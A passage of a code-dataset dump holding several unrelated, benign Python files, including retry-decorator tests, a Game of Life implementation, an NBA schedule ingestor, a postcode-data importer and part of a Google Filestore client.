RetryableError('failed')\n\n with pytest.raises(RetryableError):\n always_fails()\n\n assert counter == 4\n\n\ndef test_multiple_exception_types():\n counter = 0\n\n @retry((RetryableError, AnotherRetryableError), tries=4, delay=0.1)\n def raise_multiple_exceptions(counter):\n counter += 1\n if counter == 1:\n raise RetryableError('a retryable error')\n elif counter == 2:\n raise AnotherRetryableError('another retryable error')\n else:\n return [counter, 'success']\n\n r_counter, r_result = raise_multiple_exceptions(counter)\n assert r_counter == 3\n r_result == 'success'\n\n\ndef test_unexpected_exception_does_not_retry():\n\n @retry(RetryableError, tries=4, delay=0.1)\n def raise_unexpected_error():\n raise UnexpectedError('unexpected error')\n\n with pytest.raises(UnexpectedError):\n raise_unexpected_error()\n\n\ndef test_using_a_logger():\n counter = 0\n\n sh = logging.StreamHandler()\n logger = logging.getLogger(__name__)\n logger.addHandler(sh)\n\n @retry(RetryableError, tries=4, delay=0.1, logger=logger)\n def fails_once(counter):\n counter += 1\n if counter < 2:\n raise RetryableError('failed')\n else:\n return 'success'\n\n fails_once(counter)\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"270706658","text":"#!/usr/bin/env python3\nimport argparse\nimport sys\n\nfrom zulipterminal.core import ZulipController\n\n\ndef parse_args():\n description = '''\n Starts Zulip-Terminal.\n '''\n formatter_class = argparse.RawDescriptionHelpFormatter\n parser = argparse.ArgumentParser(description=description,\n formatter_class=formatter_class)\n\n parser.add_argument('--config-file', '-c',\n action='store',\n help='config file downloaded from your zulip\\\n organization.(e.g. ~/zuliprc)')\n parser.add_argument('--theme', '-t',\n default='default',\n help='choose color theme. (e.g. blue, light)')\n\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n try:\n ZulipController(args.config_file, args.theme).main()\n except KeyboardInterrupt:\n print(\"\\nThanks for using the Zulip-Terminal interface.\\n\")\n sys.exit(1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"76998605","text":"'''\nDescription:\nGiven an array of integers, find two numbers such that they add up to a specific target number.\n The function twoSum should return indices of the two numbers such that they add up to the target, where index1 must be less than index2.\n Please note that your returned answers (both index1 and index2) are not zero-based.\n You may assume that each input would have exactly one solution.\n\nInput: numbers={2, 7, 11, 15}, target=9\nOutput: index1=1, index2=2\n'''\n\n\nclass Solution:\n # @param {integer[]} nums\n # @param {integer} target\n # @return {integer[]}\n def twoSum(self, nums, target):\n #create dictionary with key as nums item and value as nums index\n #note: dict in python in implemented with hash table, it has access time O(1)\n #suppose all items in intList are unique\n\n myDict = {} # tracks all the processed numbers with its latest index\n\n #check each entry in intList if it has a matching pair with target\n for i in range(len(nums)):\n currNum = nums[i]\n targetNum = target - currNum # calculate the expected counterPart\n\n if targetNum in myDict: # if this counterPart is in myDict, means we have a valid pair, return this pair\n return [myDict[targetNum]+1, i+1]\n myDict[currNum] = i # updating the current number to myDict\n\n return None # if nothing returned within the above for loop, then there is no such pairs in nums, return None\n\nlist = [2,7,11,15]\nprint(Solution().twoSum(list, 9))\n","sub_path":"Python/001-TwoSum.py","file_name":"001-TwoSum.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590535315","text":"import sys\nsys.path.append(\"../\")\nsys.path.append(\"../framework\")\n\nimport unittest as ut\nimport time\n\nimport job_scheduler as js\nimport dummy_job_test as fj\nimport base_case as bc\n\n\nclass TestJobScheduler(bc.TABaseCase):\n\n def _get_configs(self, delta):\n configs = [{\"priority\": i % 2, \"duration\": i % 2 + delta}\n for i in range(0, self.size - 1)]\n # append a once job\n configs.append({\"priority\": 0, \"duration\": 0})\n return configs\n\n def setUp(self):\n super(TestJobScheduler, self).setUp()\n self.size = 10\n configs = self._get_configs(1)\n self.scheduler = js.JobScheduler(fj.DummyJobFactory(configs))\n self.scheduler.start()\n\n def test_all(self):\n self.do_test_all(1)\n\n def do_test_all(self, delta):\n (sleep_time, ready_jobs) = self.scheduler.get_ready_jobs()\n time.sleep(sleep_time + 0.1)\n once_job_scheduled = False\n for i in range(1, 60):\n (sleep_time, ready_jobs) = self.scheduler.get_ready_jobs()\n for job in ready_jobs:\n if job.get(\"duration\") == 0:\n once_job_scheduled = True\n self.assertGreaterEqual(len(ready_jobs), 1)\n self.assertGreaterEqual(self.scheduler.number_of_jobs(),\n self.size - 1)\n if len(ready_jobs) > 1:\n for j, job in enumerate(ready_jobs):\n if j != 0:\n self.assertGreaterEqual(\n ready_jobs[j - 1].get(\"priority\"),\n ready_jobs[j].get(\"priority\"))\n time.sleep(sleep_time + 0.1)\n if once_job_scheduled:\n size = self.size - 1\n else:\n size = self.size\n self.assertEquals(self.scheduler.number_of_jobs(), size)\n\n def tearDown(self):\n self.scheduler.tear_down()\n\n\nif __name__ == \"__main__\":\n ut.main()\n","sub_path":"SplunkApps/TA_framework/unit/test_frmk_job_scheduler.py","file_name":"test_frmk_job_scheduler.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351458252","text":"import pylab as pyl\nimport matplotlib.pyplot as plt\nimport matplotlib.widgets as wig\n#from matplotlib.widgets import Slider, Button, RadioButtons\n\n## Sin Wave Plot ##\n\nfig = plt.figure()\nax = plt.axes(xlim=(0, 1), ylim=(-10, 10))\nl, = ax.plot([], [], lw=2, color='red')\n\nfig.add_subplot(111)\nfig.subplots_adjust(left=0.25, bottom=0.25)\n\n#t = arange(0.0, 1.0, 0.001)\n## Amplitude of sin wave\na0 = 5\n## Phase of sin wave\nf0 = 3\n## Sin wave equation applied to entire range, t\n##s = a0*sin(2*pi*f0*t)\n## `l,` is a plot of t vs s, with adjusted line width and color\n## Save this plot as l, for later use\n##l, = plot(t,s, lw=2, color='red')\n#l, = plot([], [], lw=2, color='red')\n#\n### Slider Plot ##\n## Define dimensions of a new plot\n#axis([0, 1, -10, 10])\n\n\n# We need to somehow put these on a subplot of some sort\n# New axis color\naxcolor = 'lightgoldenrodyellow'\n# Define positions of sliders\naxfreq = plt.axes([0.25, 0.1, 0.65, 0.03], axisbg=axcolor)\naxamp = plt.axes([0.25, 0.15, 0.65, 0.03], axisbg=axcolor)\n\n# Define Sliders, ranges, and initial values\nsfreq = wig.Slider(axfreq, 'Freq', 0.1, 30.0, valinit=f0)\nsamp = wig.Slider(axamp, 'Amp', 0.1, 10.0, valinit=a0)\n\n\ndef update(val):\n amp = samp.val\n freq = sfreq.val\n #l.set_ydata(amp*np.sin(2*np.pi*freq*t))\n # draw()\nsfreq.on_changed(update)\nsamp.on_changed(update)\n\nresetax = plt.axes([0.8, 0.025, 0.1, 0.04])\nbutton = wig.Button(resetax, 'Reset', color=axcolor, hovercolor='0.975')\n\n\ndef reset(event):\n sfreq.reset()\n samp.reset()\nbutton.on_clicked(reset)\n\nrax = plt.axes([0.025, 0.5, 0.15, 0.15], axisbg=axcolor)\nradio = wig.RadioButtons(rax, ('red', 'blue', 'green'), active=0)\n\n\ndef colorfunc(label):\n l.set_color(label)\n plt.draw()\nradio.on_clicked(colorfunc)\n\ndef init():\n l.set_data([], [])\n return l,\n\nimport numpy as np\n\ndef animate(i):\n amp = samp.val\n freq = sfreq.val\n x = np.linspace(0, 2, 1000)\n y = amp * np.sin(2 * np.pi * (x - freq * i))\n #y = a0 * np.sin(2 * np.pi *( x - f0 * i))\n l.set_data(x, y)\n return l,\n\nfrom matplotlib import animation\n\nanim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=200, interval=200,\n blit=True)\n\n\nplt.show()\n","sub_path":"python/Libraries/matplotlib/Inter-mation.py","file_name":"Inter-mation.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"20708503","text":"import spacy\nfrom spacy.tokens import Span\n\nnlp = spacy.load(\"es_core_news_sm\")\n\n\ndef get_wikipedia_url(span):\n # Obtén la URL de Wikipedia si el span tiene uno de los siguientes labels\n if span.label_ in (\"PER\", \"ORG\", \"LOC\"):\n entity_text = span.text.replace(\" \", \"_\")\n return \"https://es.wikipedia.org/w/index.php?search=\" + entity_text\n\n\n# Añade la extensión del Span, wikipedia_url, usando el getter get_wikipedia_url\nSpan.set_extension(\"wikipedia_url\", getter=get_wikipedia_url)\n\ndoc = nlp(\n \"Antes de finalizar 1976, el interés de David Bowie en la \"\n \"floreciente escena musical alemana, le llevó a mudarse a \"\n \"Alemania para revitalizar su carrera.\"\n)\nfor ent in doc.ents:\n # Imprime en pantalla el texto y la URL de Wikipedia de la entidad\n print(ent.text, ent._.wikipedia_url)\n","sub_path":"exercises/es/solution_03_11.py","file_name":"solution_03_11.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"404858861","text":"from Files import Files\nfrom Cell import Cell\nimport random\n\n\nclass Environment:\n \"\"\"Algorithms for Game of Life\"\"\"\n def __init__(self, world_size, not_bordered, use_file):\n \"\"\"Sets up the critical variables and actions\"\"\"\n self.files = Files()\n self.spawn = 3 # The number of surrounding cells that alive cells spawn at\n self.goldilocks = [2, 3] # The lower and upper bounds for life to stay living\n self.not_bordered = not_bordered\n self.world_size = world_size\n self.end = False # Whether or not the world will end\n self.world = self.generate_world() # Create cell objects for each position within the world\n self.file_conversion(use_file) # Change the variables if the files are meant to be used\n\n def generate_world(self):\n \"\"\"Create cell objects for each position within the world\"\"\"\n return [[Cell() for y in range(self.world_size[1])] for x in range(self.world_size[0])]\n\n def change_specific(self, cell_pos):\n \"\"\"Switches a specific cells value\"\"\"\n cell = self.world[cell_pos[0]][cell_pos[1]] # Selects the object stored in the selected position\n cell.update_history(True) # Changes selected cell to its opposite\n cell.wipe_history() # Ensures that the cell history remains clean even after multiple switches\n\n def spawn_random(self):\n \"\"\"Changes all cell values randomly\"\"\"\n for x in range(self.world_size[0]): # For each cell in the world\n for y in range(self.world_size[1]):\n if random.choice([True, False]):\n self.change_specific((x, y)) # Change cell value to its opposite based on random chance\n\n def next_generation(self):\n \"\"\"Calculates the next positions of life\"\"\"\n updates = [] # Updates to implement\n\n for x in range(self.world_size[0]): # For every coordinate in the cell range\n for y in range(self.world_size[1]):\n cell = self.world[x][y] # Set cell to the object stored in that coordinate\n surroundings = self.test_surroundings((x, y)) # Store the number of alive cells around the chosen cell\n # If the cell is under the conditions to spawn or die\n if (surroundings == self.spawn and not cell.is_alive()) or\\\n ((surroundings < self.goldilocks[0] or surroundings > self.goldilocks[1]) and cell.is_alive()):\n updates.append(cell) # Add cell to list recording changes to implement\n\n for x in range(self.world_size[0]): # For all coordinates in the cell range\n for y in range(self.world_size[1]):\n cell = self.world[x][y] # Set cell to the object stored in that coordinate\n # Updates cell history based on whether they are in the updates list\n if cell in updates:\n cell.update_history(True)\n else:\n cell.increment_history()\n\n self.files.update_world_history(self.world_size, self.world)\n # If the end count is equal to the total number of cells\n if not updates:\n self.end = True # The end becomes true\n\n def test_surroundings(self, cell_position):\n \"\"\"Returns the number of alive surrounding cells\"\"\"\n cell_count = 0 # The number of cells surrounding the origin cell\n for x_shift in range(3): # For every coordinate in the surroundings\n for y_shift in range(3):\n try: # Attempt the following unless it returns a IndexError\n scan_x = cell_position[0] + x_shift - 1 # The x_coordinate for the cell to scan\n scan_y = cell_position[1] + y_shift - 1 # The y_coordinate for the cell to scan\n\n if self.not_bordered: # If the game is not bordered\n scan_x = scan_x % self.world_size[0] # Loop the scanned positions\n scan_y = scan_y % self.world_size[1]\n\n if scan_x == -1 or scan_y == -1 or (x_shift - 1 == 0 and y_shift - 1 == 0):\n continue # Continue if the selected cell is off the screen or the original cell\n if self.world[scan_x][scan_y].is_alive(): # If the selected cell is alive\n cell_count += 1\n\n except IndexError:\n continue\n\n # Return the number of cells surrounding cell that are alive\n return cell_count\n\n def file_conversion(self, use_file):\n \"\"\"Converts the history output from the file class into the relevant self variables\"\"\"\n if use_file[0] and use_file[0] <= len(self.files.file_data):\n history = self.files.return_world_history(use_file[1])\n self.world_size = history[0] # Sets the world size according to file data\n self.world = self.generate_world()\n for x in range(self.world_size[0]): # For all coordinates in the cell range\n for y in range(self.world_size[1]):\n filed_cell = history[1][x][y] # Set filed_cell to the stored data at that point\n if filed_cell[0]:\n self.change_specific((x, y)) # If cell is recorded as alive, then make it so\n if filed_cell[1]:\n if not filed_cell[0]:\n self.change_specific((x, y)) # Change the specific cell\n self.world[x][y].update_history(True) # List cell as dead if it is recorded\n else:\n self.world[x][y].increment_history() # Add history if it is recorded\n","sub_path":"Algorithm.py","file_name":"Algorithm.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"65725991","text":"import scipy.io as sio\nimport matplotlib.pyplot as plt\nimport pickle\nimport mne\nimport numpy as np\nimport argparse\nimport os\nimport sys\nimport statsmodels.stats.proportion as prop\nimport read_data_batch\n\n# Averages and visualizes and saves (as .pdf) the data from all subjects of certain condition.\n# input:\n#\t--path \n#\t--condition \n#\t--t (optional)\n#\n# Data are saved in the input path directory\n\n# ADD CONFIDENCE INTERVALS!\n\nfig_size = (16,9)\n\nparser = argparse.ArgumentParser(description='Enter path to files and timestamp (optional)')\nparser.add_argument('--path') # Required - path to folder with batch, containing subject specific folders\nparser.add_argument('--condition') # Required - condition to average over\nparser.add_argument('--t') # Optional to pick timestamp on figure 2\nparser.add_argument('--reconstructed') # Optional to pick reconstruction mode: attended/unattended\n\nargs = parser.parse_args();\n\nif args.reconstructed is None:\n\trec = ''\nelse:\n\trec = '_' + args.reconstructed\n\ndir_list = os.listdir(args.path)\nplot_list = list()\n\nfor i in dir_list:\n\tif i.find(args.condition) != -1 and i.find('pdf') == -1 and i.find(rec) != -1:\n\t\tplot_list.append(i)\n\nif len(plot_list) == 0:\n\tsys.exit('Condition not found!')\n\nperf_m, corr_a_m, corr_ua_m, B_coef_m, best_L_m, lambdas, nlag, nchannels, N, eeg_info = read_data_batch.read_data(plot_list, args)\n\nCI_L = np.ones([len(lambdas)])*prop.proportion_confint(N/2,N)[0]\nCI_U = np.ones([len(lambdas)])*prop.proportion_confint(N/2,N)[1]\n\nfig1 = plt.figure(1,figsize=fig_size)\nfig1.add_subplot(1,2,1)\nplt.plot(np.log10(lambdas),perf_m)\nplt.plot(np.log10(lambdas),CI_L, 'k--')\nplt.plot(np.log10(lambdas),CI_U, 'k--')\nplt.xlabel('$log_{10}(\\lambda_n)$')\nplt.ylabel('Average decoder performance')\nplt.legend(['attended','0.95 confidence interval'])\nfig1.add_subplot(1,2,2)\nplt.plot(np.log10(lambdas),corr_a_m)\nplt.plot(np.log10(lambdas),corr_ua_m)\nplt.legend(['attended','unattended'])\nplt.xlabel('$log_{10}(\\lambda_n)$')\nplt.ylabel('Average correlation coefficient')\nplt.title('$\\lambda_n$ vs avg(correlation)')\nplt.tight_layout()\n# fig1.show()\n\n# Timestamp marked in the picture\nif args.t is None:\n\tt = 0.01#[s]\nelse:\n\tt = args.t\n\nB_heat = B_coef_m.reshape(nlag,nchannels)\n\nfig2 = plt.figure(2,figsize=fig_size)\nfig2.add_subplot(1,2,1)\nplt.title('Average model coefficients with average regularization parameter $\\lambda_n$ = {}'.format(best_L_m), fontsize=10)\nplt.pcolor(B_heat.transpose(),cmap='RdBu_r')\nplt.axis([0, nlag, nchannels, 0])\nplt.colorbar()\nplt.ylabel('channel n.')\nplt.xticks(range(0,nlag), ['%.3f' % float(i/eeg_info['sfreq']) for i in range(0,nlag)], rotation='vertical', fontsize=7)\nplt.xlabel('timelag [s]')\nfig2.add_subplot(1,2,2)\nplt.title('Topographic plot at t = %.3f s'%t)\nmne.viz.plot_topomap(B_heat[int(t*eeg_info['sfreq'])][0:nchannels], eeg_info, show=False, cmap='RdBu_r')\nplt.tight_layout()\n# fig2.show()\n\ntimes = [round(0.001*x,6) for x in range(6,15)]\n\nfig3 = plt.figure(3,figsize=fig_size)\n\nfor i in range(0,len(times)):\n\tfig3.add_subplot(3,3,i+1)\n\tmne.viz.plot_topomap(B_heat[int(times[i]*eeg_info['sfreq'])][0:nchannels], eeg_info, show=False, cmap='RdBu_r')\n\tplt.title('T = ' + str(times[i]) + 'ms')\n\nplt.tight_layout()\n# fig3.show()\n\n# raw_input()\n\nfig1.savefig(args.path + args.condition + rec + '_avg_performance.pdf')\nfig2.savefig(args.path + args.condition + rec + '_avg_model_coeff.pdf')\nfig3.savefig(args.path + args.condition + rec + '_avg_timestamps.pdf')\n\nfig1.clf();\nfig2.clf();\nfig3.clf();","sub_path":"visualisation_scripts/visualize_real_avg.py","file_name":"visualize_real_avg.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"9301916","text":"\"\"\"This class ingests all game and game dates for a given season.\"\"\"\nfrom datetime import date, datetime, timezone\n\nfrom fantalytix_python_crawler.crawler.sports_reference.basketball\\\n .season_schedule_page_parser import SeasonSchedulePageParser\n\nfrom fantalytix_sqlalchemy.orm.common.league import League\nfrom fantalytix_sqlalchemy.orm.common.season import Season\nfrom fantalytix_sqlalchemy.orm.common.team import Team\nfrom fantalytix_sqlalchemy.orm.nba.nba_game import NBAGame\n\nclass NBASeasonScheduleIngestor:\n\n EMPTY_STR = ''\n STATUS_COMPLETED = 'completed'\n STATUS_SCHEDULED = 'scheduled'\n STATUS_IN_PROGRESS = 'in_progress'\n\n def __init__(self):\n self.signature = self.__repr__()\n self.league_cache = dict()\n self.season_cache = dict()\n self.team_cache = dict()\n self.nba_game_cache = dict()\n\n def get_league_by_abbreviation(self, abbreviation, session):\n \"\"\"Gets the league object from the cache if available. If the \n object has not yet been retrieved, or if the object is no longer \n associated with the session, refresh with a new query.\n \"\"\"\n league = self.league_cache.get(abbreviation)\n if league is None or league not in session:\n league = session.query(League)\\\n .filter_by(abbreviation=abbreviation)\\\n .one()\n self.league_cache[abbreviation] = league\n return league\n\n def get_season(self, end_year, abbreviation, session):\n \"\"\"Gets the season object from the cache if available. If the \n object has not yet been retrieved, or if the object is no longer \n associated with the session, refresh with a new query.\n \"\"\"\n league = self.get_league_by_abbreviation(abbreviation, session)\n season = self.season_cache.get((end_year, league))\n if season is None or season not in session:\n season = session.query(Season).filter_by(\n end_year=end_year,\n league_id=league.id\n ).one()\n self.season_cache[(end_year, league)] = season\n return season\n\n def get_team_by_abbreviation(self, abbreviation, session):\n \"\"\"Gets the team object from the cache if available. If the \n object has not yet been retrieved, or if the object is no longer \n associated with the session, refresh with a new query.\n \"\"\"\n team = self.team_cache.get(abbreviation)\n if team is None or team not in session:\n team = session.query(Team)\\\n .filter_by(abbreviation=abbreviation)\\\n .one()\n self.team_cache[abbreviation] = team\n return team\n\n def get_team_by_name(self, name, session):\n \"\"\"Gets the team object from the cache if available. If the \n object has not yet been retrieved, or if the object is no longer \n associated with the session, refresh with a new query.\n \"\"\"\n name = name.lower()\n team = self.team_cache.get(name)\n if team is None or team not in session:\n team = session.query(Team)\\\n .filter_by(name=name)\\\n .one()\n self.team_cache[name] = team\n return team\n\n def get_status(self, game_date):\n if game_date > datetime.now():\n return self.STATUS_SCHEDULED\n return self.STATUS_COMPLETED\n\n def overtime_to_int(self, text):\n if text is None or self.EMPTY_STR:\n return 0\n return 1\n\n def map_to_nba_game(self, row, session, season):\n home_team = self.get_team_by_name(row['home_team_name'], session)\n away_team = self.get_team_by_name(row['visitor_team_name'], session)\n game_date = datetime.combine(row['game_date'], row['game_start_time'])\n if row['home_pts'] > row['visitor_pts']:\n winning_team = home_team\n else:\n winning_team = away_team\n return NBAGame(\n season_id=season.id,\n home_team_id=home_team.id,\n away_team_id=away_team.id,\n game_date=game_date,\n home_score=row['home_pts'],\n away_score=row['visitor_pts'],\n overtimes=self.overtime_to_int(row['overtimes']),\n winning_team_id=winning_team.id,\n status=self.get_status(game_date),\n type=row['type']\n )\n\n def update_nba_game(self, row, session, nba_game):\n \"\"\"Updates the nba_game object if its information is different from the \n nba_game row.\n \"\"\"\n if nba_game.home_score != row['home_pts']:\n nba_game.home_score = row['home_pts']\n updated = True\n if nba_game.away_score != row['visitor_pts']:\n nba_game.away_score = row['visitor_pts']\n updated = True\n if nba_game.overtimes != self.overtime_to_int(row['overtimes']):\n nba_game.overtimes = self.overtime_to_int(row['overtimes'])\n updated = True\n if row['home_pts'] > row['visitor_pts']:\n winning_team = nba_game.home_team\n else:\n winning_team = nba_game.away_team\n if updated:\n nba_game.winning_team_id = winning_team_id\n nba_game.last_updated_by = self.signature\n nba_game.last_updated_date = datetime.now(tz=timezone.utc)\n return nba_game\n\n def get_nba_game_query(self, row, session, season):\n game_date = datetime.combine(row['game_date'], row['game_start_time'])\n home_team = self.get_team_by_name(row['home_team_name'], session)\n away_team = self.get_team_by_name(row['visitor_team_name'], session)\n return session.query(NBAGame).filter_by(\n season_id=season.id,\n home_team_id=home_team.id,\n away_team_id=away_team.id,\n game_date=game_date)\n\n def get_nba_game_or_none(self, row, session, season):\n return self.get_nba_game_query(row, session, season).one_or_none()\n\n def ingest_all(self, html, session, season_end_year, \n league_abbreviation='NBA'):\n \"\"\"This method iterates through each scheduled game row starting from \n the top of the page, adds new games and updates existing games.\n \"\"\"\n parser = SeasonSchedulePageParser(html)\n for row in parser.get_data():\n season = self.get_season(\n season_end_year, \n league_abbreviation, \n session)\n nba_game = self.get_nba_game_or_none(row, session, season)\n if nba_game is None:\n session.add(self.map_to_nba_game(row, session, season))\n else:\n self.update_nba_game(row, session, nba_game)\n\n def __repr__(self):\n return \"\"\n","sub_path":"src/fantalytix_python_ingestion/ingestion/sports_reference/basketball/nba_season_schedule_ingestor.py","file_name":"nba_season_schedule_ingestor.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"523233688","text":"import os\nimport psutil\nimport shutil\nimport tempfile\nimport urllib.request\nfrom django.core.management.base import BaseCommand\nfrom storage.zipfile import unzip\nfrom uk_geo_utils.management.commands.import_onspd import Command as LocalImporter\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\"url\", action=\"store\")\n\n def check_memory(self):\n # Downloading, unzipping and working with the ONSPD\n # requires a decent chunk of memory to play with.\n # Running this import on a really small instance\n # like a t2.micro will cause an Out Of Memory error\n\n # Ensure we've got >2Gb total before we start\n mem = psutil.virtual_memory()\n gb = ((mem.total / 1024) / 1024) / 1024\n return gb >= 2\n\n def handle(self, **options):\n if not self.check_memory():\n raise Exception(\n \"This instance has less than the recommended memory. Try running the import from a larger instance.\"\n )\n\n url = options[\"url\"]\n self.stdout.write(\"Downloading data from %s ...\" % (url))\n tmp = tempfile.NamedTemporaryFile()\n urllib.request.urlretrieve(url, tmp.name)\n tempdir = unzip(tmp.name)\n data_path = os.path.join(tempdir, \"Data\")\n try:\n cmd = LocalImporter()\n cmd.handle(**{\"path\": data_path, \"transaction\": False})\n finally:\n self.cleanup(tempdir)\n\n def cleanup(self, tempdir):\n # clean up the temp files we created\n try:\n shutil.rmtree(tempdir)\n except OSError:\n self.stdout.write(\"Failed to clean up temp files.\")\n","sub_path":"every_election/apps/core/management/commands/import_onspd_remote.py","file_name":"import_onspd_remote.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"12445260","text":"# Copyright 2023 Google LLC. All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom connector import channel\nfrom google3.cloud.graphite.mmv2.services.google.filestore import instance_pb2\nfrom google3.cloud.graphite.mmv2.services.google.filestore import instance_pb2_grpc\n\nfrom typing import List\n\n\nclass Instance(object):\n def __init__(\n self,\n name: str = None,\n description: str = None,\n state: str = None,\n status_message: str = None,\n create_time: str = None,\n tier: str = None,\n labels: dict = None,\n file_shares: list = None,\n networks: list = None,\n etag: str = None,\n project: str = None,\n location: str = None,\n service_account_file: str = \"\",\n ):\n channel.initialize()\n self.name = name\n self.description = description\n self.tier = tier\n self.labels = labels\n self.file_shares = file_shares\n self.networks = networks\n self.project = project\n self.location = location\n self.service_account_file = service_account_file\n\n def apply(self):\n stub = instance_pb2_grpc.FilestoreBetaInstanceServiceStub(channel.Channel())\n request = instance_pb2.ApplyFilestoreBetaInstanceRequest()\n if Primitive.to_proto(self.name):\n request.resource.name = Primitive.to_proto(self.name)\n\n if Primitive.to_proto(self.description):\n request.resource.description = Primitive.to_proto(self.description)\n\n if InstanceTierEnum.to_proto(self.tier):\n request.resource.tier = InstanceTierEnum.to_proto(self.tier)\n\n if Primitive.to_proto(self.labels):\n request.resource.labels = Primitive.to_proto(self.labels)\n\n if InstanceFileSharesArray.to_proto(self.file_shares):\n request.resource.file_shares.extend(\n InstanceFileSharesArray.to_proto(self.file_shares)\n )\n if InstanceNetworksArray.to_proto(self.networks):\n request.resource.networks.extend(\n InstanceNetworksArray.to_proto(self.networks)\n )\n if Primitive.to_proto(self.project):\n request.resource.project = Primitive.to_proto(self.project)\n\n if Primitive.to_proto(self.location):\n request.resource.location = Primitive.to_proto(self.location)\n\n request.service_account_file = self.service_account_file\n\n response = stub.ApplyFilestoreBetaInstance(request)\n self.name = Primitive.from_proto(response.name)\n self.description = Primitive.from_proto(response.description)\n self.state = InstanceStateEnum.from_proto(response.state)\n self.status_message = Primitive.from_proto(response.status_message)\n self.create_time = Primitive.from_proto(response.create_time)\n self.tier = InstanceTierEnum.from_proto(response.tier)\n self.labels = Primitive.from_proto(response.labels)\n self.file_shares = InstanceFileSharesArray.from_proto(response.file_shares)\n self.networks = InstanceNetworksArray.from_proto(response.networks)\n self.etag = Primitive.from_proto(response.etag)\n self.project = Primitive.from_proto(response.project)\n self.location = Primitive.from_proto(response.location)\n\n def delete(self):\n stub = instance_pb2_grpc.FilestoreBetaInstanceServiceStub(channel.Channel())\n request = instance_pb2.DeleteFilestoreBetaInstanceRequest()\n request.service_account_file = self.service_account_file\n if Primitive.to_proto(self.name):\n request.resource.name = Primitive.to_proto(self.name)\n\n if Primitive.to_proto(self.description):\n request.resource.description = Primitive.to_proto(self.description)\n\n if InstanceTierEnum.to_proto(self.tier):\n request.resource.tier = InstanceTierEnum.to_proto(self.tier)\n\n if Primitive.to_proto(self.labels):\n request.resource.labels = Primitive.to_proto(self.labels)\n\n if InstanceFileSharesArray.to_proto(self.file_shares):\n request.resource.file_shares.extend(\n InstanceFileSharesArray.to_proto(self.file_shares)\n )\n if InstanceNetworksArray.to_proto(self.networks):\n request.resource.networks.extend(\n InstanceNetworksArray.to_proto(self.networks)\n )\n if Primitive.to_proto(self.project):\n request.resource.project = Primitive.to_proto(self.project)\n\n if Primitive.to_proto(self.location):\n request.resource.location = Primitive.to_proto(self.location)\n\n response = stub.DeleteFilestoreBetaInstance(request)\n\n @classmethod\n def list(self, project, location, service_account_file=\"\"):\n stub = instance_pb2_grpc.FilestoreBetaInstanceServiceStub(channel.Channel())\n request = instance_pb2.ListFilestoreBetaInstanceRequest()\n request.service_account_file = service_account_file\n request.Project = project\n\n request.Location = location\n\n return stub.ListFilestoreBetaInstance(request).items\n\n def to_proto(self):\n resource = instance_pb2.FilestoreBetaInstance()\n if Primitive.to_proto(self.name):\n resource.name = Primitive.to_proto(self.name)\n if Primitive.to_proto(self.description):\n resource.description = Primitive.to_proto(self.description)\n if InstanceTierEnum.to_proto(self.tier):\n resource.tier = InstanceTierEnum.to_proto(self.tier)\n if Primitive.to_proto(self.labels):\n resource.labels = Primitive.to_proto(self.labels)\n if InstanceFileSharesArray.to_proto(self.file_shares):\n resource.file_shares.extend(\n InstanceFileSharesArray.to_proto(self.file_shares)\n )\n if InstanceNetworksArray.to_proto(self.networks):\n resource.networks.extend(InstanceNetworksArray.to_proto(self.networks))\n if Primitive.to_proto(self.project):\n resource.project = Primitive.to_proto(self.project)\n if Primitive.to_proto(self.location):\n resource.location = Primitive.to_proto(self.location)\n return resource\n\n\nclass InstanceFileShares(object):\n def __init__(\n self,\n name: str = None,\n capacity_gb: int = None,\n source_backup: str = None,\n nfs_export_options: list = None,\n ):\n self.name = name\n self.capacity_gb = capacity_gb\n self.source_backup = source_backup\n self.nfs_export_options = nfs_export_options\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_pb2.FilestoreBetaInstanceFileShares()\n if Primitive.to_proto(resource.name):\n res.name = Primitive.to_proto(resource.name)\n if Primitive.to_proto(resource.capacity_gb):\n res.capacity_gb = Primitive.to_proto(resource.capacity_gb)\n if Primitive.to_proto(resource.source_backup):\n res.source_backup = Primitive.to_proto(resource.source_backup)\n if InstanceFileSharesNfsExportOptionsArray.to_proto(\n resource.nfs_export_options\n ):\n res.nfs_export_options.extend(\n InstanceFileSharesNfsExportOptionsArray.to_proto(\n resource.nfs_export_options\n )\n )\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceFileShares(\n 